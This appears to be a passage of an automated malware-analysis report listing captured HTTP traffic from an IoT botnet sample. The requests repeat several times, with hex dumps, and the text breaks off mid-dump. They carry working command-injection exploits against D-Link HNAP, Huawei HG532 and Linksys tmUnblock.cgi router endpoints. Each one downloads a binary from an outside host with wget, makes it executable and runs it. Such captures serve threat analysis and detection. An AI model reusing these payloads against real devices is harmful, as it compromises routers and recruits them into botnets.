Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 